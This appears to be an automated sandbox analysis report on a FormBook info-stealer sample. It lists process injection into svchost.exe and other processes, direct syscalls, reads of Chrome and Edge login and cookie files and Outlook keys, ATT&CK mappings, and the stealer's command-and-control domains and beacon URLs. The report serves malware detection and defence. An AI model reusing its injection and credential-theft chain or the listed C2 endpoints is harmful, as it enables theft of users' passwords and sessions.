            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread register set: target process: 3060Jump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 30B2008Jump to behavior
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\jpdy1E8K4A.exe"Jump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
            Source: URUrIrqwFu.exe, 00000003.00000002.3983513250.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, URUrIrqwFu.exe, 00000003.00000000.2269464937.0000000000BE1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: jpdy1E8K4A.exe, URUrIrqwFu.exe, 00000003.00000002.3983513250.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, URUrIrqwFu.exe, 00000003.00000000.2269464937.0000000000BE1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: URUrIrqwFu.exe, 00000003.00000002.3983513250.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, URUrIrqwFu.exe, 00000003.00000000.2269464937.0000000000BE1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: URUrIrqwFu.exe, 00000003.00000002.3983513250.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, URUrIrqwFu.exe, 00000003.00000000.2269464937.0000000000BE1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: jpdy1E8K4A.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2356846252.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3983803562.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3981537741.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3984182354.00000000040E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3983690192.0000000003310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2361090040.0000000007C30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2357806281.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3991557809.0000000007130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: jpdy1E8K4A.exeBinary or memory string: WIN_XP
            Source: jpdy1E8K4A.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
            Source: jpdy1E8K4A.exeBinary or memory string: WIN_XPe
            Source: jpdy1E8K4A.exeBinary or memory string: WIN_VISTA
            Source: jpdy1E8K4A.exeBinary or memory string: WIN_7
            Source: jpdy1E8K4A.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2356846252.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3983803562.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3981537741.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3984182354.00000000040E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3983690192.0000000003310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2361090040.0000000007C30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2357806281.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3991557809.0000000007130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		5
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		5
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS16
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		5
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets141
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts312
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1529045 Sample: jpdy1E8K4A.exe Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 31 www.woshop.online 2->31 33 www.tekilla.wtf 2->33 35 19 other IPs or domains 2->35 39 Suricata IDS alerts for network traffic 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Multi AV Scanner detection for submitted file 2->43 45 3 other signatures 2->45 10 jpdy1E8K4A.exe 1 2->10         started        signatures3 process4 signatures5 55 Writes to foreign memory regions 10->55 57 Maps a DLL or memory area into another process 10->57 59 Switches to a custom stack to bypass stack traces 10->59 13 svchost.exe 10->13         started        process6 signatures7 61 Maps a DLL or memory area into another process 13->61 16 URUrIrqwFu.exe 13->16 injected process8 dnsIp9 25 www.nobartv6.website 103.224.182.242, 50025, 50026, 50027 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 16->25 27 www.kexweb.top 63.250.47.40, 50004, 50005, 50006 NAMECHEAP-NETUS United States 16->27 29 8 other IPs or domains 16->29 37 Found direct / indirect Syscall (likely to bypass EDR) 16->37 20 netbtugc.exe 13 16->20         started        signatures10 process11 signatures12 47 Tries to steal Mail credentials (via file / registry access) 20->47 49 Tries to harvest and steal browser information (history, passwords, etc) 20->49 51 Modifies the context of a thread in another process (thread injection) 20->51 53 2 other signatures 20->53 23 firefox.exe 20->23         started        process13

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            jpdy1E8K4A.exe71%ReversingLabsWin32.Backdoor.FormBook
            jpdy1E8K4A.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.elsupertodo.net
            		148.72.152.174
            		truetrue
              		unknown
              webredir.vip.gandi.net
              		217.70.184.50
              		truetrue
                		unknown
                www.nobartv6.website
                		103.224.182.242
                		truetrue
                  		unknown
                  www.kexweb.top
                  		63.250.47.40
                  		truetrue
                    		unknown
                    bola88site.one
                    		172.96.191.39
                    		truetrue
                      		unknown
                      www.dyme.tech
                      		13.248.169.48
                      		truetrue
                        		unknown
                        www.mizuquan.top
                        		43.242.202.169
                        		truetrue
                          		unknown
                          redirect.3dns.box
                          		172.191.244.62
                          		truetrue
                            		unknown
                            jobworklanka.online
                            		91.184.0.200
                            		truetrue
                              		unknown
                              omexai.info
                              		3.33.130.190
                              		truetrue
                                		unknown
                                natroredirect.natrocdn.com
                                		85.159.66.93
                                		truetrue
                                  		unknown
                                  www.tekilla.wtf
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.omexai.info
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.sailnway.net
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.woshop.online
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.languagemodel.pro
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.bola88site.one
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.jobworklanka.online
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.arlon-commerce.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.kxshopmr.store
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown

                                                    Contacted URLs

                                                    NameMaliciousAntivirus DetectionReputation
                                                    http://www.dyme.tech/h7lb/true
                                                      		unknown
                                                      http://www.kexweb.top/3bdq/true
                                                        		unknown
                                                        http://www.languagemodel.pro/nxfn/true
                                                          		unknown
                                                          http://www.dyme.tech/h7lb/?I4ET5=RbPHaORuq3VLsIvBIelJ5GO51GGMXVitxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0U8wzgLDyi+d9/jciraahzpwjZL5E+FLfjf2KFU0ZNlPPutFUmc0=&5xn03=7vMx2HlPWltrue
                                                            		unknown
                                                            http://www.languagemodel.pro/nxfn/?I4ET5=6j3CvtUhPdUgNSN+xHguQlWnRKyrmKs9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVfWaAaU8Sg/CwIadyJZ1Vunf0ESMtavaN5FCA7KYOqo/KmyEXwiQ=&5xn03=7vMx2HlPWltrue
                                                              		unknown
                                                              http://www.kexweb.top/3bdq/?I4ET5=mPDvA1qI3GiuntP+47r7UbinyaAdWbB61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exv0kyrqFFpmLMz7jnyzN+XheUDXt53FO2cfXJKOJNKmSe0FPHbZU=&5xn03=7vMx2HlPWltrue
                                                                		unknown
                                                                http://www.elsupertodo.net/2jit/?5xn03=7vMx2HlPWl&I4ET5=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1SoEkaj2DIJpzLN/p7keITu3kRidpknmkeFNiZOa1jl486ZzlEj4=true
                                                                  		unknown
                                                                  http://www.nobartv6.website/pp43/true
                                                                    		unknown
                                                                    http://www.tekilla.wtf/fpzw/true
                                                                      		unknown
                                                                      http://www.tekilla.wtf/fpzw/?I4ET5=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVx4v2Cu8U6PY7doS41bFIW7T/4/1mYTXkrfUCe/4cLGyNDvWcha0=&5xn03=7vMx2HlPWltrue
                                                                        		unknown
                                                                        http://www.omexai.info/7xi5/true
                                                                          		unknown
                                                                          http://www.mizuquan.top/e0nr/true
                                                                            		unknown
                                                                            http://www.bola88site.one/3qit/true
                                                                              		unknown
                                                                              http://www.jobworklanka.online/ikh0/true
                                                                                		unknown
                                                                                http://www.jobworklanka.online/ikh0/?5xn03=7vMx2HlPWl&I4ET5=lvx8xqKuEeZXr5IXmtDcOSOuXgPzygssZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVSaGyiGmLaE43R+XLSCAO1uL6vU7t5jilJUCYKPYTSTWzBlftPtFsf3/wj5zdrQAyp0VL/hTg=true
                                                                                  		unknown
                                                                                  http://www.omexai.info/7xi5/?I4ET5=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELAz/7PAbspGHYrJhwiAgKAJ54r5fuZ48YeCJJLAh0jfNMUyJhiqw=&5xn03=7vMx2HlPWltrue
                                                                                    		unknown

                                                                                    URLs from Memory and Binaries

                                                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                                                    https://duckduckgo.com/chrome_newtabnetbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://duckduckgo.com/ac/?q=netbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.iconetbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      http://www.nobartv6.websiteURUrIrqwFu.exe, 00000003.00000002.3991557809.0000000007194000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=netbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://www.elsupertodo.net/2jit/?5xn03=7vMx2HlPWl&I4ET5=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWURUrIrqwFu.exe, 00000003.00000002.3989981117.0000000005408000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3985399158.0000000004478000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2758378598.000000001F9D8000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://www.gandi.net/en/domainURUrIrqwFu.exe, 00000003.00000002.3989981117.0000000005A50000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3985399158.0000000004AC0000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3987592373.0000000006550000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://www.ecosia.org/newtab/netbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://whois.gandi.net/en/results?search=languagemodel.proURUrIrqwFu.exe, 00000003.00000002.3989981117.0000000005A50000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3985399158.0000000004AC0000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3987592373.0000000006550000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://ac.ecosia.org/autocomplete?q=netbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnetbtugc.exe, 00000005.00000003.2653149270.0000000007F9D000.00000004.00000020.00020000.00000000.sdmpfalse
